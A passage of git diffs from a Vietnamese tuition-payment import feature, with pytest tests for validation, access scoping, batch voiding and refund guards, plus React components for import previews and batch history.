+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "issued", "0", "1000000")],
+        )
+        # trả đúng 10tr gốc → matched (1 alloc = 10tr)
+        ok = await pis.resolve_and_validate(
+            db, [_draft("001234567890", "10000000")], 2026, 1, None
+        )
+        assert ok.rows[0].status == MATCHED
+        assert ok.rows[0].allocations[0].amount == Decimal("10000000")
+        # trả 10tr + 1đ → vượt gốc 10tr (dù remaining gồm penalty là 11tr) → ERROR
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567891",
+            invoices=[(1, "10000000", "issued", "0", "1000000")],
+        )
+        over = await pis.resolve_and_validate(
+            db, [_draft("001234567891", "10000001")], 2026, 1, None
+        )
+        assert over.rows[0].status == ERROR
+        assert "vượt tổng còn nợ" in over.rows[0].message
+
+    async def test_partial_paid_principal_remaining(self, db, seeded_dependencies):
+        # đã trả 4tr gốc → còn 6tr; trả 6tr → matched, trả 6tr+1 → error
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "partial", "4000000", "0")],
+        )
+        res = await pis.resolve_and_validate(
+            db, [_draft("001234567890", "6000000")], 2026, 1, None
+        )
+        assert res.rows[0].status == MATCHED
+        assert res.rows[0].allocations[0].amount == Decimal("6000000")
+
+    async def test_idor_other_unit_not_found(
+        self, db, seeded_dependencies, second_unit
+    ):
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            unit_id=second_unit.id,
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        # kế toán unit 1001 → không thấy hồ sơ unit 2001
+        scoped = await pis.resolve_and_validate(
+            db,
+            [_draft("001234567890", "1000000")],
+            2026,
+            1,
+            seeded_dependencies["unit_id"],
+        )
+        assert scoped.rows[0].status == ERROR
+        assert "không tìm thấy" in scoped.rows[0].message
+        # admin (unit_id=None) → thấy
+        glob = await pis.resolve_and_validate(
+            db, [_draft("001234567890", "1000000")], 2026, 1, None
+        )
+        assert glob.rows[0].status == MATCHED
+
+    async def test_soft_deleted_lead_not_found(self, db, seeded_dependencies):
+        # Finding 2: hồ sơ của lead đã xóa mềm KHÔNG được khớp
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            deleted_at=datetime.now(timezone.utc),
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        res = await pis.resolve_and_validate(
+            db, [_draft("001234567890", "1000000")], 2026, 1, None
+        )
+        assert res.rows[0].status == ERROR
+        assert "không tìm thấy" in res.rows[0].message
+
+    async def test_wrong_semester_is_error(self, db, seeded_dependencies):
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            semester=1,
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        res = await pis.resolve_and_validate(
+            db, [_draft("001234567890", "1000000")], 2026, 2, None
+        )  # hỏi HK2
+        assert res.rows[0].status == ERROR
+        assert "không có học phí" in res.rows[0].message
+
+
+# =============================================================================
+# create_preview_batch / preview_import (DB persistence)
+# =============================================================================
+class TestPreviewBatch:
+    async def test_preview_import_persists_batch_and_rows(
+        self, db, seeded_dependencies, admin_user
+    ):
+        await _seed_tuition(
+            db,
+            seeded_dependencies,
+            citizen_id="001234567890",
+            invoices=[(1, "10000000", "issued", "0", "0")],
+        )
+        content = _csv_bytes(
+            [
+                pis.TEMPLATE_COLS,
+                [
+                    "001234567890",
+                    "Nguyễn Văn An",
+                    "10.000.000",
+                    "05/09/2026",
+                    "TM",
+                    "",
+                    "",
+                ],  # matched (tên khớp seed)
+                ["009999999999", "X", "1.000.000", "05/09/2026", "TM", "", ""],  # error
+            ]
+        )
+        batch, preview = await pis.preview_import(
+            db,
+            content=content,
+            filename="thu.csv",
+            academic_year=2026,
+            semester_no=1,
+            created_by_id=admin_user.id,
+            unit_id=None,
+        )
+        await db.commit()
+
+        assert batch.status == PaymentImportBatchStatusEnum.preview.value
+        assert batch.row_count == 2
+        assert batch.matched_count == 1 and batch.failed_count == 1
+        assert batch.total_amount == Decimal("10000000")
+
+        rows = (
+            (
+                await db.execute(
+                    select(PaymentImportRow)
+                    .where(PaymentImportRow.batch_id == batch.id)
+                    .order_by(PaymentImportRow.row_no)
+                )
+            )
+            .scalars()
+            .all()
+        )
+        assert len(rows) == 2
+        assert rows[0].status == MATCHED and rows[0].citizen_id == "001234567890"
+        assert rows[0].resolved_profile_id is not None
+        assert rows[1].status == ERROR
+
+    async def test_invalid_cccd_row_stores_null_citizen_id(
+        self, db, seeded_dependencies, admin_user
+    ):
+        # CCCD 9 số (CMND) → cột String(12) lưu NULL, raw giữ giá trị gốc
+        content = _csv_bytes(
+            [
+                pis.TEMPLATE_COLS,
+                ["123456789", "X", "1.000.000", "05/09/2026", "TM", "", ""],
+            ]
+        )
+        batch, _ = await pis.preview_import(
+            db,
+            content=content,
+            filename="thu.csv",
+            academic_year=2026,
+            semester_no=1,
+            created_by_id=admin_user.id,
+            unit_id=None,
+        )
+        await db.commit()
+        row = (
+            await db.execute(
+                select(PaymentImportRow).where(PaymentImportRow.batch_id == batch.id)
+            )
+        ).scalar_one()
+        assert row.status == ERROR
+        assert row.citizen_id is None  # không tràn cột String(12)
+        assert row.raw.get(pis.COL_CCCD) == "123456789"  # gốc vẫn audit được
+
+    async def test_replaces_stale_preview_same_file(
+        self, db, seeded_dependencies, admin_user
+    ):
+        sha = "a" * 64
+        p1 = pis.PreviewResult(
+            rows=[pis.RowResult(row_no=2, status=ERROR, raw={})],
+            matched_count=0,
+            warned_count=0,
+            failed_count=1,
+            total_amount=Decimal("0"),
+        )
+        b1 = await pis.create_preview_batch(
+            db,
+            preview=p1,
+            academic_year=2026,
+            semester_no=1,
+            file_name="f.csv",
+            file_sha256_hex=sha,
+            created_by_id=admin_user.id,
+        )
+        await db.flush()
+        b1_id = b1.id
+
+        # preview lại CÙNG file (sha) — nội dung khác (2 dòng) → thay batch cũ
+        p2 = pis.PreviewResult(
+            rows=[
+                pis.RowResult(row_no=2, status=ERROR, raw={}),
+                pis.RowResult(row_no=3, status=ERROR, raw={}),
+            ],
+            matched_count=0,
+            warned_count=0,
+            failed_count=2,
+            total_amount=Decimal("0"),
+        )
+        b2 = await pis.create_preview_batch(
+            db,
+            preview=p2,
+            academic_year=2026,
+            semester_no=1,
+            file_name="f.csv",
+            file_sha256_hex=sha,
+            created_by_id=admin_user.id,
+        )
+        await db.commit()
+
+        batches = (
+            (
+                await db.execute(
+                    select(PaymentImportBatch).where(
+                        PaymentImportBatch.file_sha256 == sha
+                    )
+                )
+            )
+            .scalars()
+            .all()
+        )
+        assert len(batches) == 1  # batch cũ đã bị thay
+        assert batches[0].id == b2.id
+        assert batches[0].row_count == 2
+        # child rows của batch cũ phải bị cascade-xóa (không để mồ côi)
+        old_rows = (
+            (
+                await db.execute(
+                    select(PaymentImportRow).where(PaymentImportRow.batch_id == b1_id)
+                )
+            )
+            .scalars()
+            .all()
+        )
+        assert old_rows == []
+
+    async def test_committed_file_conflicts(self, db, seeded_dependencies, admin_user):
+        sha = "b" * 64
+        committed = PaymentImportBatch(
+            academic_year=2026,
+            semester_no=1,
+            file_name="old.csv",
+            file_sha256=sha,
+            status=PaymentImportBatchStatusEnum.committed.value,
+            committed_at=datetime.now(timezone.utc),
+            row_count=1,
+            matched_count=1,
+            warned_count=0,
+            failed_count=0,
+            total_amount=Decimal("1000000"),
+            created_by_id=admin_user.id,
+        )
+        db.add(committed)
+        await db.flush()
+
+        p = pis.PreviewResult(
+            rows=[],
+            matched_count=0,
+            warned_count=0,
+            failed_count=0,
+            total_amount=Decimal("0"),
+        )
+        with pytest.raises(ConflictError):
+            await pis.create_preview_batch(
+                db,
+                preview=p,
+                academic_year=2026,
+                semester_no=1,
+                file_name="new.csv",
+                file_sha256_hex=sha,
+                created_by_id=admin_user.id,
+            )
+
+    async def test_integrity_error_maps_to_conflict(
+        self, db, seeded_dependencies, admin_user, monkeypatch
+    ):
+        # Test-gap #7: nhánh race 2 upload cùng file lọt pre-check → partial-unique
+        # nổ ở flush → service phải rollback + ConflictError (KHÔNG để thành 500).
+        # Mô phỏng bằng cách ép flush ném IntegrityError.
+        from sqlalchemy.exc import IntegrityError
+
+        async def _boom(*a, **k):
+            raise IntegrityError("INSERT", {}, Exception("dup file_sha256"))
+
+        monkeypatch.setattr(db, "flush", _boom)
+        p = pis.PreviewResult(
+            rows=[],
+            matched_count=0,
+            warned_count=0,
+            failed_count=0,
+            total_amount=Decimal("0"),
+        )
+        with pytest.raises(ConflictError):
+            await pis.create_preview_batch(
+                db,
+                preview=p,
+                academic_year=2026,
+                semester_no=1,
+                file_name="race.csv",
+                file_sha256_hex="c" * 64,
+                created_by_id=admin_user.id,
+            )

--- a/Backend_FastAPI/tests/services/test_payment_import_service.py
+++ b/Backend_FastAPI/tests/services/test_payment_import_service.py
@@ -772,8 +772,8 @@ class TestResolveValidate:
     async def test_g1_duplicate_cccd_same_amount_warns_copy(
         self, db, seeded_dependencies
     ):
-        # G1: 2 dòng cùng CCCD + CÙNG số tiền (nghi copy nhầm → thu khống) → cả 2 WARNED,
-        # message "nghi copy". Cả 2 vẫn lọt nợ (10tr) nên không bị chốt "vượt nợ" bắt.
+        # G1: 2 dòng cùng CCCD + CÙNG số tiền (nghi copy nhầm → thu khống) → cả 2
+        # WARNED, message "nghi copy". Cả 2 vẫn lọt nợ (10tr) nên không bị "vượt nợ".
         await _seed_tuition(
             db,
             seeded_dependencies,
@@ -798,7 +798,8 @@ class TestResolveValidate:
     async def test_g1_duplicate_cccd_diff_amount_warns_not_copy(
         self, db, seeded_dependencies
     ):
-        # G1: cùng CCCD KHÁC số tiền (tách đợt hợp lệ) → WARNED "kiểm tra trùng", KHÔNG "copy".
+        # G1: cùng CCCD KHÁC số tiền (tách đợt hợp lệ) → WARNED "kiểm tra trùng",
+        # KHÔNG "copy".
         await _seed_tuition(
             db,
             seeded_dependencies,
@@ -820,9 +821,9 @@ class TestResolveValidate:
         assert "copy" not in res.rows[0].message
 
     async def test_g2_method_inactive_is_error(self, db, seeded_dependencies):
-        # G2: hình thức map-OK theo text (bank_transfer) nhưng PaymentMethod INACTIVE trong
-        # DB → ERROR ngay ở preview (đối xứng commit:1017, hết "khớp giả"). Parser :346 đã
-        # chặn text lạ; đây test nhánh inactive/missing.
+        # G2: hình thức map-OK theo text (bank_transfer) nhưng PaymentMethod INACTIVE
+        # trong DB → ERROR ngay ở preview (đối xứng commit:1017, hết "khớp giả").
+        # Parser :346 đã chặn text lạ; đây test nhánh inactive/missing.
         db.add(
             PaymentMethod(
                 code="bank_transfer", name="CK", is_online=False, is_active=False
@@ -2234,7 +2235,8 @@ class TestResultFileAndDetail:
     async def test_build_result_file_written_amount_no_trailing_cents(
         self, db, seeded_dependencies, admin_user
     ):
-        # Review #9: cột "Đã ghi (đồng)" = VND nguyên (KHÔNG đuôi '.00' của Numeric(15,2)).
+        # Review #9: cột "Đã ghi (đồng)" = VND nguyên (KHÔNG đuôi '.00' của
+        # Numeric(15,2)).
         batch = await _mk_batch_with_row(
             db,
             creator_id=admin_user.id,
@@ -2270,7 +2272,8 @@ class TestResultFileAndDetail:
     async def test_includes_profile_name_column_after_student_name(
         self, db, seeded_dependencies, admin_user
     ):
-        # Cột "Tên hồ sơ" (tên hệ thống) chèn NGAY SAU "Họ và tên học sinh" để đối chiếu.
+        # Cột "Tên hồ sơ" (tên hệ thống) chèn NGAY SAU "Họ và tên học sinh" để đối
+        # chiếu.
         profile, _, _ = await _seed_tuition(
             db,
             seeded_dependencies,

--- a/Backend_FastAPI/tests/services/test_payment_import_service.py
+++ b/Backend_FastAPI/tests/services/test_payment_import_service.py
@@ -1711,10 +1711,11 @@ class TestVoidBatch:
         lead_id = prof.lead_id
         orig = seeded_dependencies["initial_status_id"]
         await db.commit()
-        await pis.commit_batch(
+        cres, _ = await pis.commit_batch(
             db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
         )
         await db.commit()
+        assert cres.payment_count == 1  # HK2 batch THỰC ghi tiền (test không rỗng)
         lead = (
             await db.execute(select(models.Lead).where(models.Lead.id == lead_id))
         ).scalar_one()
@@ -1728,6 +1729,49 @@ class TestVoidBatch:
             await db.execute(select(models.Lead).where(models.Lead.id == lead_id))
         ).scalar_one()
         assert lead2.consultation_status_id == orig  # void HK2 → KHÔNG revert
+
+    async def test_void_money_reversed_even_if_lead_revert_flush_fails(
+        self, db, seeded_dependencies, admin_user, monkeypatch
+    ):
+        # C1 regression: revert chạy db.flush() (cuốn pending đảo tiền vào savepoint
+        # của nó) RỒI lỗi → việc đảo tiền KHÔNG được cuốn theo, vì void đã flush đảo
+        # tiền NGOÀI savepoint trước vòng revert. (Không fix → tiền sẽ rollback theo.)
+        await self._seed_sts10(db)
+        await _seed_system_user(db)
+        await _seed_cash_method(db)
+        batch = await _preview_batch(db, seeded_dependencies, importer_id=admin_user.id)
+        batch_id = batch.id
+        await db.commit()
+        await pis.commit_batch(
+            db, batch_id=batch_id, importer_id=admin_user.id, unit_id=None
+        )
+        await db.commit()
+
+        async def _flush_then_boom(*, db, profile, **kwargs):
+            await db.flush()  # cuốn pending đảo tiền vào savepoint của revert
+            raise RuntimeError("revert boom sau flush")
+
+        monkeypatch.setattr(
+            "app.services.lead_admission_sync.revert_lead_tuition_paid",
+            _flush_then_boom,
+        )
+        result, _ = await pis.void_batch(
+            db, batch_id=batch_id, user_id=admin_user.id, unit_id=None, reason="x",
+        )
+        await db.commit()
+
+        # tiền VẪN đảo dù revert flush-rồi-lỗi
+        assert result.reversed_count == 1
+        pay = (await db.execute(select(Payment))).scalars().first()
+        assert pay.status == "refunded"
+        inv = (await db.execute(select(Invoice))).scalars().first()
+        assert inv.paid_amount == Decimal("0")
+        b = (
+            await db.execute(
+                select(PaymentImportBatch).where(PaymentImportBatch.id == batch_id)
+            )
+        ).scalar_one()
+        assert b.status == "void"
 
     async def test_void_reverses_payment(self, db, seeded_dependencies, admin_user):
         # §10 Void: đảo lô → trừ lại paid_amount, reverse transaction, recompute status

--- a/Backend_FastAPI/tests/services/test_payment_service.py
+++ b/Backend_FastAPI/tests/services/test_payment_service.py
@@ -1013,6 +1013,32 @@ class TestRefundService:
         await db.refresh(pf["fee"])
         assert pf["fee"].paid_amount == Decimal("700000")  # 1M - 300K
 
+    async def test_process_refund_blocked_when_payment_reversed(
+        self, db, payment_fixtures
+    ):
+        # BV-3.5 P1: payment đã bị ĐẢO (void lô import → status='refunded') KHÔNG được
+        # process refund (chống double-subtract sau void). Guard re-check sau khóa fee.
+        pf = payment_fixtures
+        payment = await self._create_verified_payment(db, pf)
+        refund_service = RefundService(db)
+        refund, _ = await refund_service.request_refund(
+            payment_id=payment.id, amount=Decimal("300000"), reason="x",
+            user_id=pf["maker"].id, unit_id=pf["unit_id"],
+        )
+        await db.commit()
+        refund, _ = await refund_service.approve_refund(
+            refund_id=refund.id, approver_id=pf["checker"].id, unit_id=pf["unit_id"],
+        )
+        await db.commit()
+        # mô phỏng void: payment → 'refunded' SAU khi refund đã approved
+        payment.status = "refunded"
+        await db.commit()
+        with pytest.raises(BusinessRuleViolation):
+            await refund_service.process_approved_refund(
+                refund_id=refund.id, processor_id=pf["checker"].id,
+                refund_reference="X", unit_id=pf["unit_id"],
+            )
+
     async def test_reject_refund(self, db, payment_fixtures):
         """Reject refund request with reason."""
         pf = payment_fixtures

--- a/frontend/src/app/(dashboard)/finance/payments/import/_components/ImportRowsTable.tsx
+++ b/frontend/src/app/(dashboard)/finance/payments/import/_components/ImportRowsTable.tsx
@@ -1,0 +1,78 @@
+"use client"
+
+import {
+  Table,
+  TableBody,
+  TableCell,
+  TableHead,
+  TableHeader,
+  TableRow,
+} from "@/components/ui/table"
+import { formatAmount, type PaymentImportRow } from "@/lib/zod/payment-import"
+
+import { RowStatusBadge } from "./ImportStatusBadge"
+
+const ROW_DISPLAY_CAP = 500
+
+/** Bảng per-row dùng chung: preview (trước commit) + lịch sử (xem lại sau commit). */
+export function ImportRowsTable({ rows }: { rows: PaymentImportRow[] }) {
+  const shown = rows.slice(0, ROW_DISPLAY_CAP)
+  return (
+    <div className="space-y-1">
+      <div className="max-h-[28rem] overflow-auto rounded-lg border">
+        <Table>
+          <TableHeader className="sticky top-0 bg-background">
+            <TableRow>
+              <TableHead className="w-14">Dòng</TableHead>
+              <TableHead>Trạng thái</TableHead>
+              <TableHead>CCCD</TableHead>
+              <TableHead className="text-right">Số tiền</TableHead>
+              <TableHead>Phân bổ / Ghi chú</TableHead>
+            </TableRow>
+          </TableHeader>
+          <TableBody>
+            {shown.map((r) => (
+              <TableRow key={r.row_no}>
+                <TableCell className="font-mono text-xs">{r.row_no}</TableCell>
+                <TableCell>
+                  <RowStatusBadge status={r.status} />
+                </TableCell>
+                <TableCell className="font-mono text-xs">
+                  {r.citizen_id ?? "—"}
+                </TableCell>
+                <TableCell className="text-right">{formatAmount(r.amount)}</TableCell>
+                <TableCell className="text-xs">
+                  {r.allocations.length > 0 ? (
+                    <span className="text-muted-foreground">
+                      {r.allocations
+                        .map(
+                          (a) => `Đợt ${a.installment_no}: ${formatAmount(a.amount)}`,
+                        )
+                        .join(" · ")}
+                    </span>
+                  ) : null}
+                  {r.message ? (
+                    <span
+                      className={
+                        r.status === "error" ? "text-red-600" : "text-amber-600"
+                      }
+                    >
+                      {r.allocations.length > 0 ? " — " : ""}
+                      {r.message}
+                    </span>
+                  ) : null}
+                </TableCell>
+              </TableRow>
+            ))}
+          </TableBody>
+        </Table>
+      </div>
+      {rows.length > ROW_DISPLAY_CAP ? (
+        <p className="text-xs text-muted-foreground">
+          Hiển thị {ROW_DISPLAY_CAP}/{rows.length} dòng đầu — xem file gốc để biết đầy
+          đủ.
+        </p>
+      ) : null}
+    </div>
+  )
+}

--- a/frontend/src/app/(dashboard)/finance/payments/import/_components/ImportRowsTable.tsx
+++ b/frontend/src/app/(dashboard)/finance/payments/import/_components/ImportRowsTable.tsx
@@ -14,11 +14,30 @@ import { RowStatusBadge } from "./ImportStatusBadge"
 
 const ROW_DISPLAY_CAP = 500
 
-/** Bảng per-row dùng chung: preview (trước commit) + lịch sử (xem lại sau commit). */
-export function ImportRowsTable({ rows }: { rows: PaymentImportRow[] }) {
+/**
+ * Bảng per-row dùng chung: preview (trước commit) + lịch sử (xem lại sau commit).
+ *
+ * `batchStatus`: void_batch chỉ đổi batch.status='void' + Payment.status='refunded',
+ * KHÔNG đổi PaymentImportRow.status (giữ matched/warned) → nếu không báo, lô ĐÃ ĐẢO
+ * vẫn hiện badge "Khớp" + đủ tiền = hiểu nhầm tiền còn ghi (lệch file kết quả). Banner
+ * khi void làm rõ.
+ */
+export function ImportRowsTable({
+  rows,
+  batchStatus,
+}: {
+  rows: PaymentImportRow[]
+  batchStatus?: string
+}) {
   const shown = rows.slice(0, ROW_DISPLAY_CAP)
   return (
     <div className="space-y-1">
+      {batchStatus === "void" ? (
+        <p className="rounded-md border border-amber-200 bg-amber-50 px-3 py-2 text-xs font-medium text-amber-800">
+          ⚠ Lô đã đảo — các khoản dưới đây đã được RÚT LẠI (hoàn về hồ sơ/học phí). Trạng
+          thái & số tiền từng dòng là tại thời điểm ghi, KHÔNG phản ánh tiền hiện tại.
+        </p>
+      ) : null}
       <div className="max-h-[28rem] overflow-auto rounded-lg border">
         <Table>
           <TableHeader className="sticky top-0 bg-background">

--- a/frontend/src/app/(dashboard)/finance/payments/import/_components/ImportStatusBadge.tsx
+++ b/frontend/src/app/(dashboard)/finance/payments/import/_components/ImportStatusBadge.tsx
@@ -1,0 +1,32 @@
+import { Badge } from "@/components/ui/badge"
+import { cn } from "@/lib/utils"
+import {
+  BATCH_STATUS_CONFIG,
+  ROW_STATUS_CONFIG,
+} from "@/lib/zod/payment-import"
+
+/** Badge cho status dòng (matched/warned/error) — fallback nếu status lạ. */
+export function RowStatusBadge({ status }: { status: string }) {
+  const cfg = ROW_STATUS_CONFIG[status]
+  return (
+    <Badge
+      variant="outline"
+      className={cn("font-medium", cfg?.className)}
+    >
+      {cfg?.label ?? status}
+    </Badge>
+  )
+}
+
+/** Badge cho status lô (preview/committed/void) — fallback nếu status lạ. */
+export function BatchStatusBadge({ status }: { status: string }) {
+  const cfg = BATCH_STATUS_CONFIG[status]
+  return (
+    <Badge
+      variant="outline"
+      className={cn("font-medium", cfg?.className)}
+    >
+      {cfg?.label ?? status}
+    </Badge>
+  )
+}

--- a/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportClient.tsx
+++ b/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportClient.tsx
@@ -1,0 +1,54 @@
+"use client"
+
+import { useState } from "react"
+
+import { Tabs, TabsContent, TabsList, TabsTrigger } from "@/components/ui/tabs"
+import type { PaymentImportPreview } from "@/lib/zod/payment-import"
+
+import { PaymentImportHistory } from "./PaymentImportHistory"
+import { PaymentImportPreviewResult } from "./PaymentImportPreviewResult"
+import { PaymentImportUploadCard } from "./PaymentImportUploadCard"
+
+export function PaymentImportClient() {
+  const [tab, setTab] = useState("new")
+  const [preview, setPreview] = useState<PaymentImportPreview | null>(null)
+
+  return (
+    <div className="container mx-auto space-y-6 py-6">
+      <div>
+        <h1 className="text-2xl font-bold tracking-tight">
+          Import thu học phí hàng loạt
+        </h1>
+        <p className="text-sm text-muted-foreground">
+          Kế toán thu offline → import file tổng hợp → hệ thống tự xác minh và
+          ghi nhận thanh toán.
+        </p>
+      </div>
+
+      <Tabs value={tab} onValueChange={setTab}>
+        <TabsList>
+          <TabsTrigger value="new">Import mới</TabsTrigger>
+          <TabsTrigger value="history">Lịch sử lô</TabsTrigger>
+        </TabsList>
+
+        <TabsContent value="new" className="space-y-6">
+          <PaymentImportUploadCard onPreview={setPreview} />
+          {preview ? (
+            <PaymentImportPreviewResult
+              preview={preview}
+              onCommitted={() => {
+                setPreview(null)
+                setTab("history")
+              }}
+              onDiscard={() => setPreview(null)}
+            />
+          ) : null}
+        </TabsContent>
+
+        <TabsContent value="history">
+          <PaymentImportHistory />
+        </TabsContent>
+      </Tabs>
+    </div>
+  )
+}

--- a/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportHistory.tsx
+++ b/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportHistory.tsx
@@ -117,7 +117,7 @@ function BatchRow({ b }: { b: PaymentImportBatchSummary }) {
             ) : detail.isError ? (
               <ErrorEmptyState message="Không tải được chi tiết lô." />
             ) : detail.data ? (
-              <ImportRowsTable rows={detail.data.rows} />
+              <ImportRowsTable rows={detail.data.rows} batchStatus={b.status} />
             ) : null}
           </TableCell>
         </TableRow>

--- a/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportHistory.tsx
+++ b/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportHistory.tsx
@@ -1,6 +1,11 @@
 "use client"
 
-import { ChevronLeft, ChevronRight } from "lucide-react"
+import {
+  ChevronDown,
+  ChevronLeft,
+  ChevronRight,
+  Download,
+} from "lucide-react"
 import { useState } from "react"
 
 import { ErrorEmptyState, TableEmptyState } from "@/components/common/EmptyState"
@@ -21,18 +26,104 @@ import {
   TableHeader,
   TableRow,
 } from "@/components/ui/table"
-import { usePaymentImportBatches } from "@/hooks/finance/usePaymentImport"
-import { formatAmount } from "@/lib/zod/payment-import"
+import {
+  usePaymentImportBatchDetail,
+  usePaymentImportBatches,
+  useDownloadPaymentImportResult,
+} from "@/hooks/finance/usePaymentImport"
+import {
+  formatAmount,
+  type PaymentImportBatchSummary,
+} from "@/lib/zod/payment-import"
 
+import { ImportRowsTable } from "./ImportRowsTable"
 import { BatchStatusBadge } from "./ImportStatusBadge"
 import { PaymentImportVoidDialog } from "./PaymentImportVoidDialog"
 
 const PAGE_SIZE = 20
+const COL_COUNT = 9 // số cột (gồm cột expand) → colSpan dòng chi tiết
 
 function formatDate(iso?: string | null): string {
   if (!iso) return "—"
   const d = new Date(iso)
   return Number.isNaN(d.getTime()) ? "—" : d.toLocaleString("vi-VN")
+}
+
+/** 1 dòng lô + (mở rộng) chi tiết per-row. Hook detail/download gọi top-level ở đây. */
+function BatchRow({ b }: { b: PaymentImportBatchSummary }) {
+  const [expanded, setExpanded] = useState(false)
+  const detail = usePaymentImportBatchDetail(b.id, expanded)
+  const download = useDownloadPaymentImportResult()
+
+  return (
+    <>
+      <TableRow>
+        <TableCell className="w-8 pr-0">
+          <Button
+            variant="ghost"
+            size="icon"
+            className="h-7 w-7"
+            aria-label={expanded ? "Thu gọn" : "Xem chi tiết"}
+            onClick={() => setExpanded((e) => !e)}
+          >
+            {expanded ? (
+              <ChevronDown className="h-4 w-4" />
+            ) : (
+              <ChevronRight className="h-4 w-4" />
+            )}
+          </Button>
+        </TableCell>
+        <TableCell className="font-mono text-xs">{b.id}</TableCell>
+        <TableCell className="whitespace-nowrap text-sm">
+          HK{b.semester_no}/{b.academic_year}
+        </TableCell>
+        <TableCell className="max-w-[12rem] truncate text-sm">
+          {b.file_name}
+        </TableCell>
+        <TableCell>
+          <BatchStatusBadge status={b.status} />
+        </TableCell>
+        <TableCell className="text-center text-xs">
+          <span className="text-green-700">{b.matched_count}</span>
+          {" / "}
+          <span className="text-amber-700">{b.warned_count}</span>
+          {" / "}
+          <span className="text-red-700">{b.failed_count}</span>
+        </TableCell>
+        <TableCell className="text-right">{formatAmount(b.total_amount)}</TableCell>
+        <TableCell className="whitespace-nowrap text-xs text-muted-foreground">
+          {formatDate(b.created_at)}
+        </TableCell>
+        <TableCell className="text-right">
+          <div className="flex items-center justify-end gap-1">
+            <Button
+              variant="outline"
+              size="sm"
+              disabled={download.isPending}
+              aria-label="Tải file kết quả (Excel)"
+              onClick={() => download.mutate({ batchId: b.id, format: "xlsx" })}
+            >
+              <Download className="h-4 w-4" />
+            </Button>
+            {b.can_void ? <PaymentImportVoidDialog batchId={b.id} /> : null}
+          </div>
+        </TableCell>
+      </TableRow>
+      {expanded ? (
+        <TableRow>
+          <TableCell colSpan={COL_COUNT} className="bg-muted/30">
+            {detail.isLoading ? (
+              <TableSkeleton rows={3} />
+            ) : detail.isError ? (
+              <ErrorEmptyState message="Không tải được chi tiết lô." />
+            ) : detail.data ? (
+              <ImportRowsTable rows={detail.data.rows} />
+            ) : null}
+          </TableCell>
+        </TableRow>
+      ) : null}
+    </>
+  )
 }
 
 export function PaymentImportHistory() {
@@ -46,7 +137,8 @@ export function PaymentImportHistory() {
       <CardHeader>
         <CardTitle>Lịch sử lô import</CardTitle>
         <CardDescription>
-          Các lô đã xem trước / ghi tiền / đảo (mới nhất trước).
+          Các lô đã xem trước / ghi tiền / đảo (mới nhất trước). Mở rộng để xem từng
+          dòng; tải file kết quả để đối soát.
         </CardDescription>
       </CardHeader>
       <CardContent className="space-y-3">
@@ -62,13 +154,12 @@ export function PaymentImportHistory() {
               <Table>
                 <TableHeader>
                   <TableRow>
+                    <TableHead className="w-8" />
                     <TableHead className="w-12">#</TableHead>
                     <TableHead>Năm / Kỳ</TableHead>
                     <TableHead>File</TableHead>
                     <TableHead>Trạng thái</TableHead>
-                    <TableHead className="text-center">
-                      Khớp / CB / Lỗi
-                    </TableHead>
+                    <TableHead className="text-center">Khớp / CB / Lỗi</TableHead>
                     <TableHead className="text-right">Tổng tiền</TableHead>
                     <TableHead>Tạo lúc</TableHead>
                     <TableHead className="text-right">Thao tác</TableHead>
@@ -76,36 +167,7 @@ export function PaymentImportHistory() {
                 </TableHeader>
                 <TableBody>
                   {data.items.map((b) => (
-                    <TableRow key={b.id}>
-                      <TableCell className="font-mono text-xs">{b.id}</TableCell>
-                      <TableCell className="whitespace-nowrap text-sm">
-                        HK{b.semester_no}/{b.academic_year}
-                      </TableCell>
-                      <TableCell className="max-w-[12rem] truncate text-sm">
-                        {b.file_name}
-                      </TableCell>
-                      <TableCell>
-                        <BatchStatusBadge status={b.status} />
-                      </TableCell>
-                      <TableCell className="text-center text-xs">
-                        <span className="text-green-700">{b.matched_count}</span>
-                        {" / "}
-                        <span className="text-amber-700">{b.warned_count}</span>
-                        {" / "}
-                        <span className="text-red-700">{b.failed_count}</span>
-                      </TableCell>
-                      <TableCell className="text-right">
-                        {formatAmount(b.total_amount)}
-                      </TableCell>
-                      <TableCell className="whitespace-nowrap text-xs text-muted-foreground">
-                        {formatDate(b.created_at)}
-                      </TableCell>
-                      <TableCell className="text-right">
-                        {b.can_void ? (
-                          <PaymentImportVoidDialog batchId={b.id} />
-                        ) : null}
-                      </TableCell>
-                    </TableRow>
+                    <BatchRow key={b.id} b={b} />
                   ))}
                 </TableBody>
               </Table>

--- a/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportHistory.tsx
+++ b/frontend/src/app/(dashboard)/finance/payments/import/_components/PaymentImportHistory.tsx
@@ -1,0 +1,143 @@
+"use client"
+
+import { ChevronLeft, ChevronRight } from "lucide-react"
+import { useState } from "react"
+
+import { ErrorEmptyState, TableEmptyState } from "@/components/common/EmptyState"
+import { Button } from "@/components/ui/button"
+import {
+  Card,
+  CardContent,
+  CardDescription,
+  CardHeader,
+  CardTitle,
+} from "@/components/ui/card"
+import { TableSkeleton } from "@/components/ui/skeletons"
+import {
+  Table,
+  TableBody,
+  TableCell,
+  TableHead,
+  TableHeader,
+  TableRow,
+} from "@/components/ui/table"
+import { usePaymentImportBatches } from "@/hooks/finance/usePaymentImport"
+import { formatAmount } from "@/lib/zod/payment-import"
+
+import { BatchStatusBadge } from "./ImportStatusBadge"
+import { PaymentImportVoidDialog } from "./PaymentImportVoidDialog"
+
+const PAGE_SIZE = 20
+
+function formatDate(iso?: string | null): string {
+  if (!iso) return "—"
+  const d = new Date(iso)
